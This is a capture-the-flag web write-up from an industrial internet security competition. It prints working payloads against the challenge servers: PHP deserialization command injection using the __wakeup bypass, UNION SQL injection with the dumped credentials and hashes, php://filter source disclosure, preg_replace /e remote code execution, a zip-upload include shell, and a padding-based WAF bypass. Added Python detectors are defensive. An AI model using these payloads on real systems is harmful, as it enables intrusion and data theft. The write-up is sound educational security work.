Chybeta

Cyber Earth Cup Industrial Internet Security Competition - Web writeup

Why does the competition have to fall in exam week...
Some of the challenges were solved after the competition ended; for now only part of the writeups are written up.

A large number of device reports went missing (warm-up challenge)

Challenge

The cloud platform's report center collected data from the device management basic service, but the data has been deleted; only one place still holds a trace of the intruder.
http://120.27.14.73:20006/

Solution

The report center has a link, whose URL turns out to be

http://120.27.14.73:20006/index.php?id=1

It is not SQL injection; try brute-forcing the id instead. With id=2333:

flag{2333_bao_pO_OOOO0o_o0OOO}

Sensitive messages of the industrial control system were leaked

Challenge

The cloud platform's message center leaked messages that should not have been leaked, which allows the system to be compromised.
http://47.104.99.231:20003/

Solution

There is a .git leak; use GitHack to download the source and audit it.

index2.php contains the following code:

<?php
$secret = $_GET['secret'];
$ad = $_GET['ad'];
if(isset($ad)){
    if(ereg("^[a-zA-Z0-9]+$", $ad) === FALSE)
    {
        echo '<script>alert("Sorry ! Again !")</script>';
    }
    elseif(strpos($ad, '--') !== FALSE)
    {
        echo "Ok Evrything will be fine!<br ><br >";
        if (stripos($secret, './') > 0) {
            die();
        }
        unserialize($secret);
    }
    else
    {
        echo '<script>alert("Sorry ! You must have --")</script>';
    }
}

ereg can be bypassed with %00 (null-byte truncation); placing -- after the %00 then reaches the second branch, which performs the unserialize. Before unserializing, a check rejects any ./ in $secret.

class.php defines the following class:

<?php
class Record{
    public $file="Welcome";
    public function __construct($file)
    {
        $this->file = $file;
    }
    public function __sleep()
    {
        $this->file = 'sleep.txt';
        return array('file');
    }
    public function __wakeup()
    {
        $this->file = 'wakeup.txt';
    }
    public function __destruct()
    {
        if ($this->file != 'wakeup.txt' && $this->file != 'sleep.txt' && $this->file != 'Welcome') {
            system("php ./import/$this->file.php");
        }else{
            echo "<?php Something destroyed ?>";
        }
    }
}

In the __destruct stage a system() call is made, but during unserialization the __wakeup method sets file to wakeup.txt. CVE-2016-7124 notes that when the property count in the serialized string does not match the actual number of properties of the object, unserialization fails and __wakeup is not invoked. That bypasses the reset: the file field is under our control and is not filtered.
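
As an added example that is not part of the original writeup, the following Python parses PHP's serialize() format and flags exactly the condition CVE-2016-7124 relies on: an object whose declared property count differs from the properties it actually carries. The class and function names are mine (not from the challenge code); this is the kind of check a WAF or log pipeline can apply to a serialized parameter before it ever reaches unserialize().

```python
# Added example, not code from the writeup: parse PHP serialize() output and flag
# objects whose declared property count differs from the properties present.
class PHPObject:
    def __init__(self, name, declared, props):
        self.name, self.declared, self.props = name, declared, props

def _int_before(s, i, sep):
    end = s.index(sep, i)                        # integer running up to `sep`
    return int(s[i:end]), end + 1

def _parse(s, i):
    """Parse one value at s[i]; return (value, index just after it)."""
    t, i = s[i], i + 2                           # type letter, then ':' (';' for N)
    if t == 'N':                                 # N;
        return None, i
    if t in 'ibd':                               # i:42;  b:1;  d:1.5;
        end = s.index(';', i)
        val = (float if t == 'd' else int)(s[i:end])
        return (bool(val) if t == 'b' else val), end + 1
    if t == 's':                                 # s:<len>:"<bytes>";
        n, i = _int_before(s, i, ':')
        val = s[i + 1:i + 1 + n]                 # length-prefixed, so quotes inside are fine
        if s[i + 1 + n:i + 3 + n] != '";':
            raise ValueError('bad string terminator at %d' % i)
        return val, i + 3 + n
    if t in 'aO':                                # a:<count>:{..}  O:<len>:"<class>":<count>:{..}
        name = None
        if t == 'O':
            n, i = _int_before(s, i, ':')
            name, i = s[i + 1:i + 1 + n], i + 3 + n   # skip quotes and the ':' after them
        declared, i = _int_before(s, i, ':')
        i += 1                                   # skip '{'
        items = {}
        while s[i] != '}':                       # walk to '}' instead of trusting the count
            k, i = _parse(s, i)
            v, i = _parse(s, i)
            items[k] = v
        if t == 'a':
            return items, i + 1
        return PHPObject(name, declared, items), i + 1
    raise ValueError('unsupported type %r at %d' % (t, i))

def _objects(v):
    if isinstance(v, PHPObject):                 # yield every object, nested ones included
        yield v
        v = v.props
    if isinstance(v, dict):
        for x in v.values():
            yield from _objects(x)

def wakeup_bypass_suspect(payload):
    value, end = _parse(payload, 0)
    if end != len(payload):
        raise ValueError('trailing data after serialized value')
    # True if any object declares more or fewer properties than it carries
    return any(o.declared != len(o.props) for o in _objects(value))
```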

From the analysis above, since ./ is not allowed, we first obtain the absolute path.

In class.php, comment out the __sleep method and append at the end:

$b =new Record('Flag.php && pwd && pwd && cat waf');
$c = serialize($b);
echo $c;

So that at execution time the following runs:

system("php ./import/Flag.php && pwd && pwd && cat waf.php");

pwd is there to obtain the current path; the rest follows from the .php suffix that gets appended. We get:

O:6:"Record":1:{s:4:"file";s:33:"Flag.php && pwd && pwd && cat waf";}

Change it to:

O:6:"Record":2:{s:4:"file";s:33:"Flag.php && pwd && pwd && cat waf";}

URL-encode it and visit:

http://47.104.99.231:20003/index2.php?ad=1%00--&secret=O%3A6%3A%22Record%22%3A2%3A%7Bs%3A4%3A%22file%22%3Bs%3A33%3A%22Flag.php%20%26%26%20pwd%20%26%26%20pwd%20%26%26%20cat%20waf%22%3B%7D

The absolute path turns out to be /var/www/html.

$b =new Record('Flag.php && pwd && cat /var/www/html/import/Flag');
$c = serialize($b);
echo $c;

We get:

O:6:"Record":1:{s:4:"file";s:48:"Flag.php && pwd && cat /var/www/html/import/Flag";}

Change it to:

O:6:"Record":2:{s:4:"file";s:48:"Flag.php && pwd && cat /var/www/html/import/Flag";}

URL-encode and visit:

http://47.104.99.231:20003/index2.php?ad=1%00--&secret=O%3A6%3A%22Record%22%3A2%3A%7Bs%3A4%3A%22file%22%3Bs%3A48%3A%22Flag.php%20%26%26%20pwd%20%26%26%20cat%20%2fvar%2fwww%2fhtml%2fimport%2fFlag%22%3B%7D

The flag:

flag{g_i_i_t_is_unsafe_ahhhahahah}

New version of the industrial control management system

Challenge

The newly added login and registration pages of the cloud industrial control management system contain a vulnerability; find the flag.
http://47.104.1.173:20004/

Solution

findpwd.php has a SQL injection vulnerability:

POST:
username=w' UNION ALL SELECT 32,32,CONCAT((SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA)),32#
information_schema<br>cetc004<br>mysql<br>performance_schema<br>

username=w' UNION ALL SELECT 32,32,CONCAT((SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=0x63657463303034)),32#
admin<br>user<br>

username=w' UNION ALL SELECT 32,32,CONCAT((SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x61646d696e)),32#
username<br>password<br>question<br>answer<br>

username=w' UNION ALL SELECT 32,32,CONCAT((SELECT+GROUP_CONCAT(username,0x20,password,0x20,question,0x20,answer)+FROM+cetc004.admin)),32#
c3tlwDmIn23 2f8667f381ff50ced6a3edc259260ba9 cetc cdwcewf2e3235y7687jnhbvdfcqsx12324r45y687o98kynbgfvds

username=w' UNION ALL SELECT 32,32,CONCAT((SELECT+GROUP_CONCAT(username,0x20,password,0x20,question,0x20,answer+SEPARATOR+0x3c62723e)+FROM+cetc004.user)),32#
c3tlwDmIn23 2f8667f381ff50ced6a3edc259260ba9 cetc cdwcewf2e3235y7687jnhbvdfcqsx12324r45y687o98kynbgfvds<br>
1 c4ca4238a0b923820dcc509a6f75849b 1 1<br>
admin c4ca4238a0b923820dcc509a6f75849b 1 1<br>
root c81e728d9d4c2f636f067f89cc14862c 1 1<br>
' 024c94d6e03b6f67a86b952b914816c7 ' '<br>
xxoo e10adc3949ba59abbe56e057f20f883e 123456 123456

A backdoor was planted in the device maintenance center of the industrial control cloud management system

Challenge

Other attackers will use the backdoor in the device maintenance center of the industrial control cloud management system to break into the system.
http://47.104.74.209:20005

Solution

Use the page parameter with a PHP stream wrapper to read the source:

GET /index.php?page=php://filter/read=convert.base64-encode/resource=index.php HTTP/1.1
Host: 47.104.74.209:20005
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=j0mvnceqjlehu86vidl4hcs986
Connection: close
Upgrade-Insecure-Requests: 1

This yields the index.php source; at line 121 of that file:

//convenient input/output feature, still under development, internal testers only
if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {
    echo "<br >Welcome My Admin ! <br >";
    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];
    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);
    }else{
        die();
    }
}

This is the backdoor: add the header and the corresponding GET parameters.

GET /index.php?pat=/(.*)/e&rep=system('ls')&sub=aa HTTP/1.1
Host: 47.104.74.209:20005
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
X-Forwarded-For: 127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=j0mvnceqjlehu86vidl4hcs986
Connection: close
Upgrade-Insecure-Requests: 1

A directory s3chahahaDir is found; it contains a directory flag with flag.php inside.

GET /index.php?pat=/(.*)/e&rep=system('cat+s3chahahaDir/flag/flag.php')&sub=aa HTTP/1.1
Host: 47.104.74.209:20005
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
X-Forwarded-For: 127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=j0mvnceqjlehu86vidl4hcs986
Connection: close
Upgrade-Insecure-Requests: 1

The flag:

flag{SecuriTY_Preg_eee3}

The customer service center of the industrial control cloud management system awaits your feedback

Challenge

The customer service center of the industrial control cloud management system has a vulnerability; the flag is in the file flag/flag/flag/flag/flag/flag/flag.php
http://47.104.188.226:20001
Find this hidden file. swp? No no no... keep looking...

Solution

There is an upload feature:

http://47.104.188.226:20001/includes/upload.php

Vim swap files (swn, swo, swp) are exposed:

http://47.104.188.226:20001/.index.php.swp
http://47.104.188.226:20001/.index.php.swo
http://47.104.188.226:20001/.index.php.swn

In fact only the .swo exists; the source can be read directly at view-source:http://47.104.188.226:20001/.index.php.swo

<?php
error_reporting(0);
ini_set('open_basedir', '/var/www/html');
function autoload($page) {
    if (stripos($_SERVER['QUERY_STRING'], 'flag') > 0) {
        die('no flag flag flag flag !');
    }
    if (stripos($_SERVER['QUERY_STRING'], 'uploaded') > 0) {
        die('no uploaded uploaded uploaded uploaded !');
    }
    if (stripos($_SERVER['QUERY_STRING'], '://f') > 0) {
        die('no ://f ://f ://f');
    }
    if (stripos($_SERVER['QUERY_STRING'], 'ata') > 0) {
        die('no ata ata ata');
    }
    if (stripos($_SERVER['QUERY_STRING'], '0') > 0) {
        die('no 0 0 0');
    }
    if(file_exists("./includes/$page.php")) {
        include "./includes/$page.php";
    }
    elseif(file_exists("./includes/$page")) {
        include "./includes/$page";
    }else{
        echo "File is not exit ";
    }
}
function download($adfile, $file){
    //Only Administrators can download files .
    $cert = 'N';
    if(isset($adfile) && file_get_contents($adfile, 'r') === 'Yeah Everything Will Be Ok My Boss') {
        echo "Welcome ! You Are Administrator !";
        $cert = 'Y';
    }else{
        echo "error1";
    }
    if ($cert === 'Y'){
        if (stripos($file, 'file_list') != false) die('error4');
        if (stripos($file, 'file_list') >= 0) {
            header('Content-Description: File Transfer');
            header('Content-Type: application/octet-stream');
            header('Content-Disposition: attachment; filename='. basename($file));
            header('Content-Transfer-Encoding: binary');
            header('Expires: 0');
            header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
            header('Pragma: public');
            header('Content-Length: ' . filesize($file));
            readfile($file);
        }else{
            die('error2');
        }
    }else{
        echo 'error3';
    }
}
if(!isset($_GET['page'])) {
    $page = 'index';
}
else {
    $page = $_GET['page'];
}
if (stripos($page, './') > 0) {
    die('no ./ ./ ./ ./');
}
if (stripos($page, '://') > 0) {
    die('no :// :// ://');
}
autoload($page);
if (isset($_GET[admin]) && isset($_GET[file])) {
    if (stripos($_GET[admin], 'flag') > 0 || stripos($_GET[file], 'flag') > 0) {
        die('not flag flag flag falg !');
    }
    if (strlen($_GET[file]) >= 38) {
        die('too long');
    }
    download($_GET[admin], $_GET[file]);
}
?>

Above is the index.php source. It has two features:

  1. autoload, which provides a file include, but many restrictions have to be bypassed; more on that later.
  2. download, which provides file download.

First use the download feature. At the bottom, two parameters, admin and file, are accepted. In the download function, the admin parameter is checked:

if(isset($adfile) && file_get_contents($adfile, 'r') === 'Yeah Everything Will Be Ok My Boss')

Combined with the upload feature this challenge offers, we visit:

http://47.104.188.226:20001/index.php?admin=php://input&file=includes/upload.php
POST:
Yeah Everything Will Be Ok My Boss

This yields the upload.php source:

<?php
if (stripos($_SERVER['QUERY_STRING'], 'flag') > 0) {
    die('no flag flag flag flag !');
}
if (!empty($_FILES)) {
    //properties of the uploaded file
    $name= $_FILES["filename"]["name"];
    $type= $_FILES["filename"]["type"];
    $size= $_FILES["filename"]["size"];
    $temp= $_FILES["filename"]["tmp_name"];
    $error= $_FILES["filename"]["error"];
    if (strlen($name) >= 6) {
        die('name is too long !');
    }
    if (stripos($name, './') > 0) {
        die('invalid parameter');
    }
    if (stripos($name, 'php') > 0) {
        die('invalid parameter');
    }
    if (substr($name, -3, 3) !== 'zip' && substr($name, -3, 3) !== 'jpg' && substr($name, -3, 3) !== 'png') {
        die('file can not upload ! ');
    }
    if ($error > 0)
        die("Error uploading file! code $error.");
    else
    {
        if($type !== "application/zip" || $size > 400)//condition for the file
        {
            die("Format not allowed or file size too big!");
        }
        else
        {
            if(file_exists('includes')){
                move_uploaded_file($temp, "includes/uploaded/" .$name);
                echo "Upload complete a!";
                shell_exec('sh /var/www/html/includes/unzip.sh');
            }elseif(file_exists('uploaded')){
                move_uploaded_file($temp, "uploaded/" .$name);
                echo "Upload complete!";
                shell_exec('sh /var/www/html/includes/unzip.sh');
            }
        }
    }
}else{
    if(isset($_GET['step']) && strlen($_GET['step']) === 20) {
        if (stripos($_GET['step'], 'lag') > 0) {
            die('error');
        }
        if (stripos($_GET['step'], './') > 0) {
            die('error');
        }
        if (stripos($_GET['step'], ' ') > 0) {
            die('error');
        }
        if (stripos($_GET['step'], '/') > 0) {
            die('error');
        }
        if (preg_match('/[^\w\d_ -]/si', $_GET['step'])) {
            $_GET['step'] = preg_replace('/[^a-zA-Z0-9_ -]/s', '', $_GET['step']);
            die('error');
        }
        passthru('cat ' . 'uploaded/' . $_GET['step']);
    }else{
        die();
    }
}
?>

Next, audit upload.php. It allows zip uploads and contains this piece of code:

if(file_exists('includes')){
    move_uploaded_file($temp, "includes/uploaded/" .$name);
    echo "Upload complete a!";
    shell_exec('sh /var/www/html/includes/unzip.sh');
}elseif(file_exists('uploaded')){
    move_uploaded_file($temp, "uploaded/" .$name);
    echo "Upload complete!";
    shell_exec('sh /var/www/html/includes/unzip.sh');
}

It calls unzip.sh; visiting http://47.104.188.226:20001/includes/unzip.sh gives the script:

#/bin/bash
cd ./uploaded
find ./ -size +1M | xargs rm
cd ../
unzip -o ./uploaded/*.zip -d ./uploaded/
rm -rf ./uploaded/*.zip
rm -rf ./uploaded/*.*
rm -rf ./uploaded/.*
cd ./uploaded
find -type d | xargs rm -rf
touch /var/www/html/includes/uploaded/index.php
chmod 000 /var/www/html/includes/uploaded/index.php

The shell script extracts the zip archive into the uploaded directory under the current directory, then deletes the three kinds of files matched by its rules and any directories. Finally it creates index.php and sets its permission bits.

Putting this together, we construct an archive whose extracted content survives the deletion, and combine it with the file include provided by index.php's page parameter to obtain a shell.

Contents of the file chybeta:

<?php
system('cat flag/flag/flag/flag/flag/flag/flag.php');
?>

Compress it as c.zip; when uploading, intercept the request and change the type to application/zip.

After the upload succeeds, unzip.sh runs and extracts the archive contents, so for example http://47.104.188.226:20001/includes/uploaded/chybeta becomes accessible.

Next, consider how to include the chybeta file under the uploaded directory. In index.php:

if (stripos($_SERVER['QUERY_STRING'], 'uploaded') > 0) {
    die('no uploaded uploaded uploaded uploaded !');
}

Since this checks $_SERVER['QUERY_STRING'] and uses stripos to locate the substring, when we visit

http://47.104.188.226:20001/index.php?uploaded&page=uploaded/chybeta

$_SERVER['QUERY_STRING'] is uploaded&page=uploaded/chybeta, stripos returns 0, and the check is bypassed.
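
The comparison bug above is easiest to see by porting index.php's checks. This is an added example, not code from the writeup or the challenge: the helper names are mine, original_filter mirrors the PHP `stripos(...) > 0` logic, and fixed_filter shows the same denylist with the comparison done correctly.

```python
# Added example, not code from the writeup: index.php's checks ported to Python
# so the comparison bug is visible. PHP's stripos() returns 0 for a needle at
# offset 0 and false when absent; `> 0` treats both as "not found".
from urllib.parse import parse_qs

QS_NEEDLES = ('flag', 'uploaded', '://f', 'ata', '0')   # checked against QUERY_STRING
PAGE_NEEDLES = ('./', '://')                             # checked against $page

def php_stripos_gt_zero(haystack, needle):
    """Mirror `stripos($h, $n) > 0`: str.find gives -1 when absent, 0 at the start."""
    return haystack.lower().find(needle.lower()) > 0

def page_param(query_string):
    """$_GET['page'], defaulting to 'index' exactly like the original."""
    return parse_qs(query_string, keep_blank_values=True).get('page', ['index'])[0]

def original_filter(query_string):
    """Return the page that reaches include, or None when a check would die()."""
    page = page_param(query_string)
    if any(php_stripos_gt_zero(page, n) for n in PAGE_NEEDLES):
        return None
    if any(php_stripos_gt_zero(query_string, n) for n in QS_NEEDLES):
        return None
    return page

def fixed_filter(query_string):
    """Same denylist with the comparison written as `!== false`: a needle at
    offset 0 now counts. (An allowlist of page names would be the real fix.)"""
    page = page_param(query_string)
    if any(n in page.lower() for n in PAGE_NEEDLES):
        return None
    if any(n in query_string.lower() for n in QS_NEEDLES):
        return None
    return page
```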

The flag:

flag{CVE_SomeThing_aBout_gitLab}

Breaking YUNWAF - QingCloud

Challenge

New version of the industrial control cloud management system, now with protection. Not sure whether the protection is any good.
http://qcloudcetc.xctf.org.cn:8099

Solution

When the username is long enough, the WAF is bypassed; here the number of a's is 886:

username=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa’+UNION+ALL+SELECT+32,32,CONCAT((SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA)),32#

result:
information_schema cetCCHqy004 mysql performance_schema

![](https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20180118/8.jpg?raw=true)

Final payload:

username=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa’+UNION+ALL+SELECT+32,32,CONCAT((SELECT+GROUP_CONCAT(username,password,question,answer+SEPARATOR+0x3c62723e)+FROM+cetCCHqy004.admin)),32#

![](https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20180118/10.jpg?raw=true)
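
Added example, not from the original writeup, covering the requests in this challenge and in the device maintenance center backdoor challenge above: a small request-line triage that URL-decodes once and flags PHP stream wrappers in parameters, the /e modifier in a pat parameter, and UNION-based injection regardless of how much padding precedes it. The sample lines are constructed, the rule and function names are mine, and prefix_only_triage models an assumed cause of the long-username bypass (a filter that inspects only a bounded prefix), which the writeup itself does not state.

```python
# Added example, not from the writeup: normalise request lines the way the
# server would and flag the three request shapes seen in these challenges.
import re
from urllib.parse import unquote_plus

RULES = [
    # any parameter whose value is a PHP stream wrapper (php://filter, php://input)
    ('php-wrapper-param', re.compile(r'(?:^|[?&])[^=&]+=php://', re.I)),
    # a preg_replace pattern parameter carrying the /e modifier
    ('preg-e-modifier', re.compile(r'(?:^|[?&])pat=/[^&]*/[a-z]*e[a-z]*(?:&|$)', re.I)),
    # UNION-based injection, independent of how much padding precedes it
    ('union-select', re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
]

def triage(line):
    """Return the rule names that match one request line after one URL-decode."""
    decoded = unquote_plus(line)
    return [name for name, rx in RULES if rx.search(decoded)]

def prefix_only_triage(line, limit=512):
    """Same rules applied to the first `limit` decoded characters only, modelling
    a filter that stops inspecting long values (assumed cause of the bypass)."""
    decoded = unquote_plus(line)[:limit]
    return [name for name, rx in RULES if rx.search(decoded)]

def scan(lines):
    """Map line index -> rule names for every line that triggers a rule."""
    hits = {}
    for i, line in enumerate(lines):
        tags = triage(line)
        if tags:
            hits[i] = tags
    return hits

# Constructed sample request lines (not real traffic); the fourth one pads the
# username with 886 'a's before the UNION clause, as in the WAF challenge.
SAMPLE_LINES = [
    "GET /index.php?page=php://filter/read=convert.base64-encode/resource=index.php",
    "GET /index.php?pat=/(.*)/e&rep=system('ls')&sub=aa",
    "POST /findpwd.php username=w'+UNION+ALL+SELECT+32,32,32,32%23",
    "POST /findpwd.php username=" + "a" * 886 + "'+UNION+ALL+SELECT+32,32,32,32%23",
    "GET /index.php?page=index",
]

if __name__ == "__main__":
    for idx, tags in scan(SAMPLE_LINES).items():
        print(idx, tags, "prefix-only:", prefix_only_triage(SAMPLE_LINES[idx]))
```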
Please pay attention to the warning records of the industrial control cloud management system

Challenge

Take part in the warning-record activity of the industrial control cloud management system and you may be rewarded with a flag
http://47.104.166.183:20008

Solution

The challenge provides the source at http://47.104.166.183:20008/getflag.php

<?php
if(!isset($_GET['c']) && !isset($_GET['re'])) {
    show_source(__FILE__);
}
$selfdir = $_GET['dir'];
if (!isset($selfdir)) {
    die();
}
$secret = '/var/www/html/hackme/' . md5("cetcrce" . $selfdir . $_SERVER['REMOTE_ADDR']);
@chdir('hackme');
@mkdir($secret);
@chdir($secret);
if (isset($_GET['c']) && strlen($_GET['c']) <= 5) {
    include('waf.php');
    @exec($_GET['c']);
}elseif(isset($_GET['re'])) {
    @exec('/bin/rm -rf ' . $secret);
    @exec('touch /var/www/html/hackme/index.php');
}
?>

Compared with HITCON 2017's BabyFirst, there is an additional waf.php, but its contents are unknown.
Reference: HITCON CTF 2017 - BabyFirst Revenge - writeup

Use wget to fetch the file index.html; running sh i* then executes sh index.html.

The flag:

flag{J0w_ab0ut_c0mmAnd_3xcu}

Parsing vulnerability in the project management page of the industrial control cloud management system

Challenge

The parsing vulnerability in this industrial control cloud management system has to be patched by the administrator.
http://47.104.156.32:20007

Solution

After entering, click Project Management; the URL is:

http://47.104.156.32:20007/index.php?page=flag.php

There is also a view-source button that gives the source:

<?php
if ($_SESSION['admin']) {
    $con = $_POST['con'];
    $file = $_POST['file'];
    $filename = "backup/".$file;
    if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){
        die("Bad file extension");
    }else{
        chdir('uploaded');
        $f = fopen($filename, 'w');
        fwrite($f, $con);
        fclose($f);
    }
}
?>
<?php
if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') {
    include 'config.php';
    $id = mysql_real_escape_string($_GET[id]);
    $sql="select * from cetc007.user where id='$id'";
    $result = mysql_query($sql);
    $result = mysql_fetch_object($result);
} else {
    $result = False;
    die();
}
if(!$result)die("<br >something wae wrong ! <br>");
if($result){
    echo "id: ".$result->id."</br>";
    echo "name:".$result->user."</br>";
    $_SESSION['admin'] = True;
}
?>

The relevant part is this piece of code:

<?php
if ($_SESSION['admin']) {
    $con = $_POST['con'];
    $file = $_POST['file'];
    $filename = "backup/".$file;
    if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){
        die("Bad file extension");
    }else{
        chdir('uploaded');
        $f = fopen($filename, 'w');
        fwrite($f, $con);
        fclose($f);
    }
}
?>

Reference: http://wonderkun.cc/index.html/?p=626

The secret of the cloud industrial control management system's documentation center

Challenge

The documentation center page of the cloud industrial control management system has a vulnerability that is not easy to spot.
http://47.104.73.107:20002/

Solution

Breaking YUNWAF - Huawei Cloud

Challenge

New version of the industrial control cloud management system, now with protection. Not sure whether the protection is any good.
http://huaweicetc.xctf.org.cn

Solution

Breaking YUNWAF - Alibaba

Challenge

New version of the industrial control cloud management system, now with protection. Not sure whether the protection is any good.
http://alicetc.xctf.org.cn

Solution


Title: Cyber Earth Cup Industrial Internet Security Competition - Web writeup

Author: chybeta

Published: 2018-01-18 11:01

Last updated: 2018-01-21 15:01

Original link: http://chybeta.github.io/2018/01/18/赛博地球杯工业互联网安全大赛-Web-writeup/

License: CC BY-NC-ND 4.0 International (Attribution, NonCommercial, NoDerivatives). When reposting, keep the original link and author.